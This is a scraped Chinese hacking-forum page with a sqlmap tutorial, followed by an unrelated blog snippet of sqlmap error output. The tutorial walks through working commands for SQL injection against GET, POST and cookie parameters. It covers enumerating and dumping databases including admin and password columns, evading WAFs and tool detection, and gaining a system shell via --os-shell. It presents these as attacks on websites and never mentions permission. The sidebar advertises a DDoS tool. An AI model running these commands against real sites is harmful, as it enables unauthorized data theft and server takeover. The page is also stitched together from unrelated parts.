我们坚信只有今天付出了，才有机会看到明天的太阳！
现在！加入我们，给你一个气氛优秀的技术圈子
请完成以下验证码
查看: 2197|回复: 10
社区更新Forums
随机图赏Gallery
2017年中旬WEB渗透系列课程-07Mysql常规注入2017年中旬WEB渗透系列课程-06Mysql注入分析ms17010 windows批量工具剑眉大侠工具包'Weblogic玩法（公开课）SQLMAP第六课之利用google批量搜索注入2017年中旬WEB渗透系列课程-05Access注入分析2017年中旬WEB渗透系列课程-01HTTP协议2017年中旬WEB渗透系列课程-00前言福利来了：cc攻击器+IP代理工具
sqlmap学习总结
查看: 2197|回复: 10
马上注册，加入HACK80！与我们一起交流。
才可以下载或查看，没有帐号？
最近看到很多大牛发sqlmap的视频教程。
然后偶就屁颠屁颠滚去下了一个，然后尼玛，一连从头看到尾。。。。。。各种科普啊，看视频有点浪费时间。
各位别去被坑爹了，来个sqlmap 简易教程算了，何必浪费看视频的时间。
sqlmap 再牛逼也就是个python的脚本，脚本再牛逼也得有--help -hh
所以第一件事当然是滚去看帮助文档。
sqlmap -hh
我操。。。。。。。这么多英文，多少只草泥马在心中奔腾，咋办，硬着头皮看呗，有些人头皮硬不了咋办，简单，来，哥教你简单的
注入分法不同，种类不同，来个简单的分类：
1.get型：sqlmap -u &http://xxx.xx.xxx/xx.xxx?xx=xxx&
2.post型: sqlmap -u &http://xxx.xx.xxx/xx.xxx& --data=&xxxx=xxxx&xxxx=xxx&
3.cookie类注入: sqlmap -u &http://xxx.xx.xxx/xx.xxx?xx=xxx& --cookie=&xxx=xxx&xxx=xxx& --level=2
好，区分完毕再来后续的
需要数据库好：--dbs
得到数据库名称xxx，需要表： -D xxx --tables
得到表名xxxx，需要段：-D xxx -T xxxx --columns
得到段内有admin，password，需要值：-D xxx -T xxxx -C &admin,password& --dump
那么我们来理解一下，-D -T -C 是干吗的，当然就是知道其名称，指定使用其。
--dbs --tables --columns 是干吗的，当然就是不知道名称，列出来呗
--dump 那自然就是字面意思，类似于导出数据的行为
其实注入有了上面这几个命令，妥妥的够用了，不过还需要绕waf --tamper=&&
注入被识别出来是工具，断开咋办--user-agent=&&
再多牛逼的功能都是慢慢积累出来的，别想一口吃成胖子
好，跑数据库就是这么简单，于是呢来一个稍微有点干货的例子：
/login.asp有post注入，我想日了,但是我不想出去拷贝post数据，很麻烦，我想让sqlmap自动跑post注入
sqlmap -u &/login.asp& --forms
很好，上面的命令成功的帮我跑了post注入，并且找到了post的注入点jjj=123
sqlmap -u &/login.asp& --forms -p jjj --dbs
于是我用上面的命令看看数据库
sqlmap -u &/login.asp& --forms -p jjj --is-dba
顺便看看当前用户是不是dba
sqlmap -u &/login.asp& --forms -p jjj -a
用了上面的命令 -a能得到什么呢：自己去看帮助吧。
帮你筛选了一下，-a下面的那些命令是用来看用户，看主机，看权限的。
后来呢，我发现权限还是挺高的，同时呢，我跑出来了数据库名称kkk
sqlmap -u &/login.asp& --forms -p jjj -D kkk --tables
同时我找到了网站路径，然后我就又一次找到了sqlmap的牛逼的--os-xx系列命令，可以执行系统命令，同时还发现了牛逼的xpcmdshell --os-shell
以及很多牛逼的文件操作命令--file-xx 这些命令在需要用的时候使用就是了，会给你带来意想不到的惊喜
与此同时，我发现tables里面没有我想要的东西，我也找不到合适的内容，咋办呢，心一横，我决定把所有的数据库内容跑出来自己找，于是我这么做：
sqlmap -u &/login.asp& --forms -p jjj -D kkk --dump-all
然后牛逼的sqlmap就开始跑啊跑，然后紧接着我的蛋就碎了，尼玛，sqlmap一会就问你一次要不要破解密码，要不要这个，要不要那个，我和我的小朋友们都想擦你妹夫，功夫不负有心人，我又看见了一个命令 --batch 可以自动选择sqlmap默认选项
于是，我可以和我的小朋友们玩耍去了，再也不用看着sqlmap拖库了。
总结下来，帮助文档还是很重要的，多看看，总会有些收获：
为了避免各位看英文看到吐，大概总结下：
Target: 字面意思，目标，那么就是确定目标的
Request: 字面意思，请求，就是定义请求内容的，比如post数据，http头，cookie注入，http头污染等等
Optimization：字面意思，调节性能，等等
Injection: 字面意思，注入的设置内容基本在这里，比如指定注入点，指定db，指定系统，等等
Detection:
基本就是用在确认注入范围，寻找注入点区域，这些
Technique:
基本用在确定注入手段，以及攻击方式
Fingerprint:
基本用在指纹识别，用的很少
Enumeration:
枚举信息，主要用在注入中，很重要，很常用
Brute force:
用来爆破，其实主要是枚举tables columns用的
User-defined function injection:
现在只有udf提权，以及指定一些自己定义的sqlmap脚本用，高端使用，求大牛指点
File system access
主要是文件读取，文件写入
Operating system access
主要用在对系统操作，例如os-shell 以及 后续的连接metasploit 实现后渗透攻击
windows registry access
基本就是注册表操作了
字面意思，综合的内容，一些特殊的功能实现，我在这里找到了crawl batch这些非常好用的参数
Miscellaneous
目测高端应用，还没怎么用过，求大神指教
如上面总结的，大概红字就是常用的命令，剩下的不常用里面也有很多很不错，在特殊情况下适用的内容，反正本贴科普而已。
width:100%">
没看完~~~~~~ 先顶，好同志
width:100%">
赞同 看视频是浪费时间
width:100%">
帮你顶下哈！！
width:100%">
不错不错，楼主您辛苦了。。。
width:100%">
管它三七二十一！
width:100%">
上次给楼主开的药，你都吃完了？
width:100%">
刚分手，心情不好！
width:100%">
楼主，替我问候您主治大夫！
width:100%">
系统居然说我是在灌水，我有吗？
width:100%">
Powered by Discuz! X3.2&&
充值199元即可成为正式会员！
现在成为正式会员即可享受：1、原创课程及工具资源下载 2、内部交流及讲师答疑服务 3、参与团队外包渗透测试项目　Linux-学习之漏洞探索sqlmap
时间： 17:28:43
&&&& 阅读：123
&&&& 评论：
&&&& 收藏：0
标签：&&&&&&&&&&&&&&&&&&&&&&&&&&&
&输出信息：
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user‘s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program
[03:50:12] [WARNING] unable to create output directory ‘/usr/share/sqlmap/output
/172.16.55.109‘ ([Errno 13] Permission denied: ‘/usr/share/sqlmap/output/172.16.
55.109‘). Using temporary directory ‘/tmp/sqlmapoutputzZYr9M‘ instead[03:50:12] [INFO] testing connection to the target URL
[03:50:12] [CRITICAL] page not found (404)it is not recommended to continue in this kind of cases. Do you want to quit and
make sure that everything is set up properly? [Y/n] [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user‘s responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
百度解释：
[ 03:50:12 ] [警告]无法创建输出目录“/ usr /分享/ sqlmap /输出/ 172.16.55.109”[ 13 ]（errno的权限被拒绝：“/ usr /分享/ sqlmap /输出/ 172.16。55.109”。使用临时目录/tmp / sqlmapoutputzzyr9m相反[ 03:50:12 ] [信息]测试连接到目标URL
【！]法律声明：攻击目标没有事先同意sqlmap使用是非法的。这是最终用户的责任，遵守所有适用的地方，州和联邦法律。开发商不承担责任和不负责的这个项目引起的任何滥用或损坏
[ 03:50:12 ] [关键]页面未找到（404）不建议继续这种情况。是否要退出并确保所有设置正常？[名词]！]法律声明：攻击目标没有事先同意sqlmap使用是非法的。这是最终用户的责任，遵守所有适用的地方，州和联邦法律。开发商不承担责任和不负责的这个项目引起的任何滥用或损坏标签：&&&&&&&&&&&&&&&&&&&&&&&&&&&原文：/Erma/p/6505901.html
教程昨日排行
&&国之画&&&& &&&&&&
&& &&&&&&&&&&&&&&
鲁ICP备号-4
打开技术之扣，分享程序人生！